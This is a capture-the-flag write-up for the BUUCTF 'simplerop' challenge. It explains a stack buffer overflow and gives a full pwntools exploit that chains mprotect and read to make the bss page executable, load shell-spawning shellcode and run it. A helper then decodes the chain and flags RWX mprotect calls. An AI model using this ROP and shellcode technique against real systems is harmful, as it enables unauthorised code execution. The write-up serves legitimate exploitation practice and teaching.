BUUCTF-cmcc_simplerop
NX is enabled, so the stack is not executable.
IDA decompilation
The program is very simple and the vulnerability is visible at a glance: a stack buffer overflow that overwrites the saved return address.
There is no system() in the program. There are several ways to solve this; here we use mprotect to make the bss page writable and executable, read the shellcode into it, and return to it.
exploit:
#coding:utf-8
from pwn import *
#p=process('simplerop')
p=remote('node3.buuoj.cn',29617)
elf=ELF('simplerop')
# Static binary: mprotect and read are resolved from the ELF symbol table.
#0x0809de85 : pop ebp ; pop esi ; pop edi ; ret   (pops the three call arguments, then returns)
pop3_ret=0x0809de85
# Stage 1: mprotect(0x080EB000, 0x1000, 7) marks the bss page RWX,
# then read(0, 0x080EBF80, 0x100) pulls the shellcode into that page, then return into it.
payload=b'a'*32   # 32 bytes of padding up to the saved return address
payload+=p32(elf.symbols['mprotect'])+p32(pop3_ret)+p32(0x080EB000)+p32(0x1000)+p32(0x7)
payload+=p32(elf.symbols['read'])+p32(pop3_ret)+p32(0)+p32(0x080EBF80)+p32(0x100)
payload+=p32(0x080EBF80)
p.sendlineafter(b'nput :',payload)
sleep(0.2)
# Stage 2: the shellcode itself, delivered through the read() call above.
payload=asm(shellcraft.sh())
p.sendline(payload)
p.interactive()
Execution result
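To make the chain layout explicit, here is an added analysis helper (not part of the original writeup) that rebuilds the same stage-1 chain with plain struct packing, decodes it word by word back into the call sequence, and flags the mprotect call that turns a page writable and executable. The gadget, bss page and stage-2 addresses are the ones from the post; the mprotect and read symbol addresses are constructed placeholders, since the post resolves them with pwntools' ELF().symbols.

```python
import struct

# Addresses from the post:
POP3_RET = 0x0809DE85   # pop ebp ; pop esi ; pop edi ; ret
BSS_PAGE = 0x080EB000   # page that gets remapped RWX
STAGE2   = 0x080EBF80   # where the second-stage read() lands
# Constructed placeholders standing in for elf.symbols['mprotect'] / ['read']:
MPROTECT = 0x0806F000
READ     = 0x0806E000

PROT  = {1: "PROT_READ", 2: "PROT_WRITE", 4: "PROT_EXEC"}
CALLS = {MPROTECT: ("mprotect", 3), READ: ("read", 3)}

def build_chain(pad=32):
    """Same stage-1 layout as the post, as raw little-endian words."""
    words = [MPROTECT, POP3_RET, BSS_PAGE, 0x1000, 0x7,
             READ, POP3_RET, 0, STAGE2, 0x100,
             STAGE2]
    return b"a" * pad + b"".join(struct.pack("<I", w) for w in words)

def decode_chain(payload, pad=32):
    """Walk the chain and recover the call sequence.
    Every call is followed by the pop-pop-pop-ret gadget, which discards the
    three arguments from the stack, so the decoder records them and skips past."""
    words = [struct.unpack_from("<I", payload, i)[0]
             for i in range(pad, len(payload), 4)]
    calls, i = [], 0
    while i < len(words):
        w = words[i]
        if w in CALLS:
            name, argc = CALLS[w]
            assert words[i + 1] == POP3_RET, "expected stack-cleanup gadget after call"
            calls.append((name, tuple(words[i + 2:i + 2 + argc])))
            i += 2 + argc
        else:                      # a bare address: control transfers there
            calls.append(("jump", (w,)))
            i += 1
    return calls

def find_wx_mprotect(calls):
    """Return mprotect calls whose prot has both PROT_WRITE and PROT_EXEC set."""
    hits = []
    for name, args in calls:
        if name == "mprotect" and (args[2] & 6) == 6:
            flags = "|".join(PROT[b] for b in (1, 2, 4) if args[2] & b)
            hits.append((hex(args[0]), args[1], flags))
    return hits
```

Running decode_chain on build_chain() yields mprotect(0x80eb000, 0x1000, 7), read(0, 0x80ebf80, 0x100) and a final jump to 0x80ebf80, the exact sequence the exploit relies on.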